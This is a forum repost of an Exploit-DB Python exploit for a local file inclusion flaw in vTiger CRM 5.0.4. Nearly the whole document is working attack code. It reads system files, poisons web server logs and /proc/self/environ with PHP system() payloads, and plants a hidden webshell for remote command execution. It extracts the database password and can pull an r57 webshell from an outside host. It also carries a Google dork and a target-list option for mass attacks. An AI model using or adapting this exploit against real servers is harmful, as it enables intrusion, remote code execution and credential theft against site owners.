Exploit vTiger CRM 5.0.4 - Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
16280
Проверка EDB
  1. Пройдено
Автор
TECR0C
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-3249
Дата публикации
2011-03-05
Код:
#!/usr/bin/python
# ~INFORMATION:									#
# Exploit Title:	Vtiger CRM 5.0.4 Pre-Auth Local File Inclusion Exploit  #
# Google Dork:		"The honest Open Source CRM" "vtiger CRM 5.0.4"		#
# Date: 		5/3/2011						#
# CVE:			CVE-2009-3249						#
# Windows link:		http://bit.ly/fiOYCL					#
# Linux link:		http://bit.ly/hluzLf					#
# Tested on:		Windows XP/Linux Ubuntu					#
# PHP.ini Settings:	gpc_magic_quotes = Off					#
# Advisory: http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt	#
# Creds: Giovanni "evilaliv3" Pellerano, Antonio "s4tan" Parata and Francesco	#
# "ascii" Ongaro are credited with the discovery of this vulnerability.		#
# Greetz: mr_me, sud0, sinn3r & my other fellow hackers				#
# Note: Loading URL files may require tampering of code ;-)			#

# ~VULNERABLE CODE:
'''
if(isset($_REQUEST['action']) && isset($_REQUEST['module']))
{
        $action = $_REQUEST['action'];
        $current_module_file = 'modules/'.$_REQUEST['module'].'/'.$action.'.php';
        $current_module = $_REQUEST['module'];
}
elseif(isset($_REQUEST['module']))
{
	$current_module = $_REQUEST['module'];
	$current_module_file = 'modules/'.$_REQUEST['module'].'/Charts.php';
}
else {
    exit();
...
...
...
require_once($current_module_file);
'''
# ~EXPLOIT:
import linecache,random,sys,urllib,urllib2,time,re,httplib,socket,base64,os,webbrowser,getpass
from optparse import OptionParser
from urlparse import urlparse,urljoin
from urllib import urlopen

__CONTACT__ ="TecR0c([email protected])"
__DATE__ ="3.3.2011"
__VERSION__ = "1.0"

# Options for running script
usage = "\nExample : %s http://localhost/vtigercrm/ -p 172.167.876.34:8080" % __file__
parser = OptionParser(usage=usage)
parser.add_option("-p","--p", type="string",action="store", dest="proxy",
        help="HTTP Proxy <server>:<port>")
parser.add_option("-f","--f", type="string",action="store", dest="file",
        help="Input list of target URLS")
parser.add_option("-P","--P",type="int",action='store', default="80", dest="port",
        help="Choose Port [Default: %default]")

(options, args) = parser.parse_args()

numlines=0
# Parameter for command execution
vulnWebPage = "graph.php?module="
# Loca File inclusion path
lfi = "../../../../../../../../../"
# OS Linux detection
linuxOS = "etc/passwd"
# OS Windows Detection
windowsOS = "windows/win.ini"
# Windows default non-IIS setup access log file for vtiger
winLogs = "../../../logs/access.log"
# Windows Vtiger Instllation PHP Info file
vtPlatformLog = "../logs/platform.log"
# Linux Log files
lnxLogs =['/var/log/access_log',
        '/var/log/access.log',
        '/var/log/apache2/access_log',
        '/var/log/apache2/access.log',
        '/var/log/apache2/error_log',
        '/var/log/apache2/error.log',
        '/var/log/apache/access_log',
        '/var/log/apache/access.log',
        '/var/log/apache/error_log',
        '/var/log/apache/error.log',
        '/var/log/user.log',
        '/var/log/user.log.1',
        '/apache/logs/access.log',
        '/apache/logs/error.log',
        '/etc/httpd/logs/acces_log',
        '/etc/httpd/logs/acces.log',
        '/etc/httpd/logs/access_log',
        '/etc/httpd/logs/access.log',
        '/etc/httpd/logs/error_log',
        '/etc/httpd/logs/error.log',
        '/usr/local/apache2/logs/access_log',
        '/usr/local/apache2/logs/access.log',
        '/usr/local/apache2/logs/error_log',
        '/usr/local/apache2/logs/error.log',
        '/usr/local/apache/logs/access_log',
        '/usr/local/apache/logs/access.log',
        '/usr/local/apache/logs/error_log',
        '/usr/local/apache/logs/error.log'
	'/logs/access.log',
        '/logs/error.log',
	'/var/log/error_log',
        '/var/log/error.log',
        '/var/log/httpd/access_log',
        '/var/log/httpd/access.log',
        '/var/log/httpd/error_log',
        '/var/log/httpd/error.log',
        '/var/www/logs/access_log',
        '/var/www/logs/access.log',
        '/var/www/logs/error_log',
        '/var/www/logs/error.log']
# User Agents
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
        "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",
        "Google Chrome 0.2.149.29 (Windows XP)",
        "Opera 9.25 (Windows Vista)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
        "Opera/8.00 (Windows NT 5.1; U; en)"]
agent = random.choice(agents)

def banner(): 
    if os.name == "posix": 
        os.system("clear") 
    else: 
        os.system("cls") 
    header = '''
 ____   _______________.___  _____________________________ 	
 \   \ /   /\__    ___/|   |/  _____/\_   _____/\______   \	
  \   Y   /   |    |   |   /   \  ___ |    __)_  |       _/	
   \     /    |    |   |   \    \_\  \|        \ |    |   \	
    \___/     |____|   |___|\______  /_______  / |____|_  /	
                      __,,,,_                                              
       _ __..-;''`--/'/ /.',-`-. 
   (`/' ` |  \ \ \ / / / / .-'/`,_   Version 5.0.4                              
  /'`\ \   |  \ | \| // // / -.,/_,'-,                                     
 /<7' ;  \ \  | ; ||/ /| | \/    |`-/,/-.,_,/')                            
/  _.-, `,-\,__|  _-| / \ \/|_/  |    '-/.;.''                             
`-`  f/ ;      / __/ \__ `/ |__/ |                                         
     `-'      |  -| =|\_  \  |-' | %s            
           __/   /_..-' `  ),'  // Date %s
          ((__.-'((___..-'' \__.'

'''%(__CONTACT__,__DATE__)
    for i in header: 
        print "\b%s"%i, 
        sys.stdout.flush() 
        time.sleep(0.003) 

# Written to clean up shell output
def cleanUp(response):
	""" Comment or Uncomment if you want to filter the unwanted text returned in logs """
	response = re.sub('<b(.*)',"", response)
	response = re.sub("Fatal error(.*)","", response)
	response = re.sub("Warning(.*)","", response)
	response = re.sub('Notice(.*)',"", response)
	return response

def firstMenu():
	print '''
[+] 1. Test Environment
[+] 2. Straight To Menu'''
        if options.file:
		print "[+] 3. Go To Next URL"
	menuChoice = raw_input("\n>> Enter Your Choice: ")
        if menuChoice == "1":
		systemOS = informationGathering()
        if menuChoice == "2":
                systemOS = raw_input("[+] Which OS? (w)indows Or (l)inux: ")
        if menuChoice == "3":
		websiteList(options.file)
		firstMenu()
	if systemOS == "l":
                linuxMenu()
        if systemOS == "w":
                windowsMenu()
	if systemOS == None:
		firstMenu()

def websiteList(websiteFile):
	global numlines
	numlines+=1
	url = linecache.getline(websiteFile, numlines)
	url = url[:-1]
	if url == '':
		print "[-] No More Entries\n"
		sys.exit()
	print "\n["+str(numlines)+"] Target: "+url
	url=urlparse(url)
	return (url, numlines)

def getProxy():
	""" Lets you setup a proxy using the proxy defined in options.proxy """
        try:
		proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
		socket.setdefaulttimeout(100)
	except(socket.timeout):
                print "\n[-] Proxy Timed Out"
                sys.exit(1)
        return proxy_handler

def lfiRequest(localFile):
        """ Lets you send a GET request to see if LFI is posible either by proxy or direct """
	if options.proxy:
		try:
			fetch_timeout = 20
			proxyfier = urllib2.build_opener(getProxy())
			proxyfier.addheaders = [('User-agent', agent)]
			response = proxyfier.open(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+localFile+"%00",None,fetch_timeout).read()
		except urllib2.HTTPError, error:
			if error.code == '500':
				pass
			if options.file:
				print "[+] Try Next URL"
                                websiteList(options.file)
				firstMenu()
				sys.exit()
			else:
				print "[-] Check Your Webaddress And Directory"
				sys.exit()
                except(urllib2.URLError):
                        print "[-] Could Not Communicate With TARGET\n"
                        print '[-] Stopping Script\n'
                        sys.exit()
	else:
		try:
			response = urllib2.Request(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+localFile+"%00")
			response.add_header('User-agent',agent)
			response = urllib2.urlopen(response).read()
			response = cleanUp(response)
		except urllib2.HTTPError, error:
			if error.code == '500':
				pass
			if options.file:
			        print "[+] Try Next URL"
                                websiteList(options.file)
			        firstMenu()
			        sys.exit()
	                else:
 				print "[-] Did Not Work"
		except(urllib2.URLError):
			print "[-] Could Not Communicate With TARGET"
                        print '[-] Stopping Script\n'
                        sys.exit()

	return response

def getRequest(localFile):
	""" Lets you send a GET request to see if LFI is posible either by proxy or direct """
	if options.proxy:
		try:
			fetch_timeout = 300
			proxyfier = urllib2.build_opener(getProxy())
			proxyfier.addheaders = [('User-agent', agent)]
			response = proxyfier.open(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+lfi+localFile+"%00",None,fetch_timeout).read()                
		except urllib2.HTTPError, error:
                        errorMessage = str(error.code)
			if errorMessage == '500':
                                print error
				response = error.read()
				pass
			else:
				print "[-] Verify Address Manually:"
				print "[+] "+url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+lfi+localFile+"%00"
				sys.exit()
	else:
                try:
			response = urllib2.Request(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+lfi+localFile+"%00")
			response.add_header('User-agent',agent)
			response = urllib2.urlopen(response).read()
		except urllib2.HTTPError, error:
                        errorMessage = str(error.code)
                     	if errorMessage == '500':
                                print error
                                pass
                        else:
                                print "[-] Verify Address Manually:"
                                print "[+] "+url.geturl()+vulnWebPage+lfi+localFile+"%00"
                                sys.exit()
	return response

def socketInject(payloadType):
	""" Lets you inject into the Apache access log by proxy or direct """
        if options.proxy:
		try:
                        proxyIp, proxyPort = options.proxy.split(':')
                        proxyPort = int(proxyPort)
			sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        sock.connect((proxyIp, proxyPort))
                        if payloadType == 'systemPayload':
				sock.send("GET "+url.scheme+"://"+url.netloc+":"+str(options.port)+"/"+"<?php;system(base64_decode($_COOKIE[value]));?> HTTP/1.1\r\n")
				sock.send("User-Agent: "+agent+"\r\n")
				sock.send("Host: "+url.geturl()+"\r\n")
				sock.send("Connection: close\r\n\r\n")
			if payloadType == 'includePayload':
				sock.send("GET "+url.scheme+"://"+url.netloc+":"+str(options.port)+"/"+"<?php;include(base64_decode($_GET[cmd]));?> HTTP/1.0\r\n\r\n")
                                sock.send("User-Agent: "+agent+"\r\n")
                                sock.send("Host: "+url.geturl()+"\r\n")
                                sock.send("Connection: close\r\n\r\n")			
			sock.close()
			print "[+] Injected Payload Into Logs"
		except:
        	        print "[-] Could Not Inject Into Logs"
			sys.exit(1)
	else:
		try:
			sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			sock.connect((url.netloc, options.port))
			if payloadType == 'systemPayload':
				sock.send("GET "+url.scheme+"://"+url.netloc+":"+str(options.port)+"/"+"<?php;system(base64_decode($_COOKIE[value]));?> HTTP/1.1\r\n")
				sock.send("User-Agent: "+agent+"\r\n")
				sock.send("Host: "+url.scheme+url.netloc+"\r\n")
				sock.send("Connection: close\r\n\r\n")
			if payloadType == 'includePayload':
				sock.send("GET "+url.scheme+"://"+url.netloc+":"+str(options.port)+"/"+"<?php;include(base64_decode($_GET[cmd]));?> HTTP/1.0\r\n")
				sock.send("User-Agent: "+agent+"\r\n")
				sock.send("Host: "+url.scheme+url.netloc+"\r\n")
				sock.send("Connection: close\r\n\r\n")
			sock.close()
			print "[+] Injected Payload Into Logs"
		except:
			print "[-] Could Not Inject Into Logs"
			sys.exit(1)

def postRequestWebShell(shellName,encodedCmd):
	""" WebShell which sends all POST requests to hide commmands being logged in access.log """
	webSiteUrl = url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+"cache/."+shellName+".php"
	if options.proxy:
		try:
			commandToExecute = [
			('cat',encodedCmd)]
			cmdData = urllib.urlencode(commandToExecute)
			proxyfier = urllib2.build_opener(getProxy())
			proxyfier.addheaders = [('User-agent', agent)]
			cmdContent = proxyfier.open(webSiteUrl, cmdData).read()
			cmdContent = cleanUp(cmdContent)
			print cmdContent
		except:
			print "[-] Request To .%s.php Failed" % shellName
	else:
                try:
			values = { 'User-Agent' : agent,
                        'cat': encodedCmd}
			data = urllib.urlencode(values)
			request= urllib2.Request(webSiteUrl, data)
			response = urllib2.urlopen(request)
			response = response.read()
			response = cleanUp(response)
			print response
		except urllib2.HTTPError, error:
                        response = error.read()

def readFromAccessLogs(cmd, logs):
	""" Lets you choose what type of os for the log location and command to run """
        if options.proxy:
                try:
			proxyfier = urllib2.build_opener(getProxy())
			proxyfier.addheaders = [('User-agent', agent)] 
			proxyfier.addheaders.append(("Cookie", "value="+cmd))
			response = proxyfier.open(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+logs+"%00").read()
                except urllib2.HTTPError, error:
			response = error.read()
			sys.exit()
        else:
                try:
			junk = None
			headers = { 'User-Agent' : agent,
			'Cookie': 'value='+cmd}
			response = urllib2.Request(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+logs+"%00",junk,headers)
			response = urllib2.urlopen(response).read()
		except urllib2.HTTPError, error:
                        response = error.read()
        return response

def informationGathering():
	""" Used to gather information if magic_quotes is on, what operating sytem is being used and if error messages are on """ 

        # Use default LICIENSE.txt file in webroot to gather information
	requestContent = lfiRequest("../LICENSE.txt")
	
	# Test for Magic Quotes
	print "[+] INFORMATION GATHERING:"
	print "[+] Checking if LFI Is Posible"
	magicQuotes = re.compile('SugarCRM Public')
	magicQuotes = magicQuotes.search(requestContent)
	if magicQuotes:
		print "[+] magic_quotes_gpc = Off"
	else:
		print "[-] magic_quotes_gpc = On"
		print "[-] Or Your URL Is Incorrect"
		if options.file:
                        websiteList(options.file)
		        firstMenu()
		else:
			sys.exit()
	# OS Detection
	try:
		passwd = getRequest(linuxOS)
		searchFor = re.compile('root:')
		searchLinuxOS = searchFor.search(passwd)
		print "[!] Working Out The Operating System"
		if searchLinuxOS:
			print "[!] OS Detection: Linux"
			systemOS = "l"
		elif not searchLinuxOS:
			winini = getRequest(windowsOS)
			searchFor = re.compile('16-bit')
			searchWindowsOS = searchFor.search(winini)
			if searchWindowsOS:
				print "[!] OS Detection: Windows"
				systemOS= "w"
			else:
				print "[!] No Data Returned, You Will Have To Guess The Operating System"
	       			firstMenu()
				systemOS = None
	except:
		print "[-] Could Not Run OS Detection"
		print "[-] System OS Could Not Be Set Try Option 2"
		systemOS = None
	try:
		# Checking for Error Messages
		print "[+] Checking If Error Messages Are Enabled"
		pathError = re.compile(r"(reference in (.*)on|not found in (.*)graph.php)")
		findPath = pathError.search(requestContent)
		if findPath:
                	print "[-]  Web Root Directory Is: "+findPath.group(1)
		elif findPath == None:
			platformRequest = getRequest(vtPlatformLog)
			pathWinRootFinder = re.compile('REQUSET\["root_directory"\]</td><td class="v">(.*)</td>')
			findWinPathRoot = pathWinRootFinder.search(platformRequest)
			if findWinPathRoot:
				 print "[-]  WWWRoot Directory From Platform.log Is: "+findWinPathRoot.group(1)
		else:
			print "[-]  Did Not Find Any Path Disclosure"
	except:
                print "[-] Could Not Run Error Message Detection"
	return systemOS 

def environInject(shellName):
        """ Lets you get a shell through proc self environ by proxy or without """
	webSiteUrl = url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+lfi+"proc/self/environ"+"%00"
	shellString = "echo '<?php;system(base64_decode($_REQUEST[cat]));?>' > cache/.%s.php" % shellName
	if options.proxy:
		try:
			print '[+] Testing If /proc/self/environ Exists'
			proxyfier = urllib2.build_opener(getProxy())
			proxyfier.addheaders = [('User-agent', agent)]
			response = proxyfier.open(webSiteUrl).read()
			patFinder = re.compile('HTTP_USER_AGENT')
			environContent = patFinder.search(response)
			if environContent:
				print '[+] Web Application Vulnerable to proc/self/environ'
				proxyfier = urllib2.build_opener(getProxy())
                                encodedCommand = base64.b64encode(shellString)
                                commandToExecute = [
                                ('cat',encodedCommand)]
				cmdData = urllib.urlencode(commandToExecute)
				proxyfier.addheaders = [('User-agent', "<?php system(base64_decode($_POST[cat]));?>")]
				cmdContent = proxyfier.open(webSiteUrl, cmdData).read()
			else:
				print '[-] Could Not Create Shell'
				sys.exit()
                except: 
                        print "[-] Seems To Not Be Vulnerable To Proc Self Environment"
        		linuxMenu()
			sys.exit()
	else:
                try:
                        shellString = "echo '<?php;system(base64_decode($_REQUEST[cat]));?>' > cache/.%s.php" % shellName
                        encodedCommand = base64.b64encode(shellString)
                        headers = {'User-Agent' : '<?php system(base64_decode($_POST[cat]));?>',
                        'cat' : encodedCommand}
                        cmdContent = urllib2.Request(webSiteUrl,junk,headers)
			cmdContent = urllib2.urlopen(cmdContent).read()
		except urllib2.HTTPError, error:
                        response = error.read()
			print response
	
	while True:
		try:
			command = raw_input(commandLine)
			encodedCmd = base64.b64encode(command)
			postRequestWebShell(shellName,encodedCmd)
		except KeyboardInterrupt:
			encodedCmd = base64.b64encode('rm .'+shellName+'.php')
			postRequestWebShell(shellName,encodedCmd)
			print "[-] CTRL+C Detected!"
			print "[+] Removed .%s.php\n" % shellName
			sys.exit()

def logInject(payloadType):
	""" Lets you choose what type of payload to use such as include or system """
	inject = raw_input("[?] To Inject? Press ENTER, Otherwise Type 'n' : ")
	if inject == 'yes' or inject == 'y' or inject == '':
		socketInject(payloadType)
        else:
		print "[!] Did Not Inject Into Logs"

def proxyCheck():
	if options.proxy:
		try:
			h2 = httplib.HTTPConnection(options.proxy)
			h2.connect()
			print "[+] Using Proxy Server:",options.proxy
		except(socket.timeout):
			print "[-] Proxy Timed Out\n"
			pass
			sys.exit(1)
		except(NameError):
			print "[-] Proxy Not Given\n"
			pass
			sys.exit(1)
		except:
			print "[-] Proxy Failed\n"
			pass
			sys.exit(1)

def shellMessage(shellName):
	print '''
 # Shell: .%s.php 
 ###########################
 # Welcome To Remote Shell #
  # This Is Not Interactive #
 # To Exist Shell Ctrl + C #
     # Hack The Gibson #
 ###########################
	''' % shellName

# Linux Techniques
def linuxMenu():
        print '''
[+] 1. Terminal By Logs
[+] 2. Terminal By Proc Self Environment'''
        if options.file:
                print '[+] 3. Go To Next URL'
        lnxChoice = raw_input(">> Enter Your Choice: ")

        # Log Technique
        if lnxChoice == '1':
                print "[!] Lets Hope You Got Rights To Their Logs!"
                for log in lnxLogs:
                        print "[-] Testing %s" % log
                        logReponse = getRequest(log)
                        command2Find = re.compile('" 200')
                        findCommand = command2Find.search(logReponse)
                        if findCommand:
                                print "[+] Injectable Log File Located @ %s" % log
                                logInject("systemPayload")
                                yourChoice = raw_input('[?] Do You Want To Create A Webshell? Press ENTER, Otherwise Type \'n\': ')
                                logWithLfi = lfi+log
                                if yourChoice == '':
                                        shellName = raw_input('[?] Name Of Your Webshell: ')
                                        print '[+] Creating Webshell'
                                        systemCommand = "echo '<?php;system(base64_decode($_REQUEST[cat]));?>' > cache/.%s.php" % shellName
                                        encodedCmd = base64.b64encode(systemCommand)
                                        readFromAccessLogs(encodedCmd, logWithLfi)
                                        print "[!] Tempting To Create WebShell .%s.php" % shellName
                                        shellMessage(shellName)
                                        while True:
                                                try:
                                                        command = raw_input(commandLine)
                                                        encodedCmd = base64.b64encode(command)
                                                        postRequestWebShell(shellName,encodedCmd)
                                                except KeyboardInterrupt:
                                                        encodedCmd = base64.b64encode('rm .'+shellName+'.php')
                                                        postRequestWebShell(shellName,encodedCmd)
                                                        print "[-] CTRL+C Detected!"
                                                        print "[+] Removed .%s.php\n" % shellName
                                                        sys.exit()
                                else:
                                        cleanUp(response)
                                        logInject("systemPayload")
                                        while True:
                                                try:
                                                        command = raw_input(commandLine)
                                                        encodedCmd = base64.b64encode(command)
                                                        postRequestWebShell(shellName,encodedCmd)
                                                except KeyboardInterrupt:
                                                        encodedCmd = base64.b64encode('rm .'+shellName+'.php')
                                                        postRequestWebShell(shellName,encodedCmd)
                                                        print "[-] CTRL+C detected!"
                                                        print "[+] Removed .%s.php\n" % shellName
                                                        sys.exit()
        # Environ Technique
        if lnxChoice == '2':
		shellName = raw_input('[?] Name Of Your Webshell: ') 
		environInject(shellName)

        if lnxChoice == '3':
                websiteList(options.file)
                firstMenu()
                sys.exit()

def windowsMenu():
		print '''
[+] 1. Remote File Inclusion Browser Shell           
[+] 2. VTiger MySQL Password
[+] 3. PHP WebShell
		'''
        	winChoice = raw_input(">> Enter your choice: ")
        	if winChoice == '1':
            		try:
                		logInject("includePayload")
                		print "[+] Example: http://www.xfocus.net.ru/soft/r57.txt"
                		rfi = raw_input('>>> Enter Your Remote Webshell URL: ')
                		webbrowser.open(url.scheme+"://"+url.netloc+":"+str(options.port)+url.path+vulnWebPage+winLogs+"%00"+"&cmd="+base64.b64encode(rfi))
                                print "[+] Check Your Web Browser!"
                        except:
                		print "[-] RFI @ %s Did Not Work" % rfi
		if winChoice == "2":
			f = lfiRequest(vtPlatformLog)
			patFinder = re.compile('POST\["db_password"\]</td><td class="v">(.*)</td>') 
			findUser = patFinder.search(f)
			if findUser is None:
				print '[-] Did Not Find MySQL Database Password'
			else:
				print "[!] VTiger Password: "+findUser.group(1)
		if winChoice == "3":
			logInject("systemPayload")
			shellName = raw_input('[?] Name Of Your Webshell: ')
			systemCommand = "echo ^<?php;system(base64_decode($_REQUEST[cat]));?^> > cache/.%s.php" % shellName
			encodedCmd = base64.b64encode(systemCommand)
			readFromAccessLogs(encodedCmd, winLogs)      		
			print "[!] Created WebShell .%s.php" % shellName
			shellMessage(shellName)
			while True:
				try: 
					command = raw_input(commandLine) 
					encodedCmd = base64.b64encode(command)
					postRequestWebShell(shellName,encodedCmd)
				except KeyboardInterrupt:
					encodedCmd = base64.b64encode('del .'+shellName+'.php')
					postRequestWebShell(shellName,encodedCmd)
					print "[-] CTRL+C Detected!"
					print "[+] Removed .%s.php\n" % shellName
					sys.exit()
if "__main__" == __name__:
	banner()
        proxyCheck()
	try:
	        url=urlparse(args[0])
	except:
		if options.file:
			print "[+] Using Website List"
			url,numlines = websiteList(options.file)
		else:
			parser.print_help()
                	print "\n[-] Check Your URL\n"	
			sys.exit(1)
	if not url.scheme:
		print usage+"\n"
		print "[-] Missing HTTP/HTTPS\n"
		sys.exit(1)
	commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc)
	if not options.file:
		print "[+] Target: "+url.scheme+"://"+url.netloc+":"+str(options.port)+url.path
	firstMenu()
 
Источник
www.exploit-db.com

Похожие темы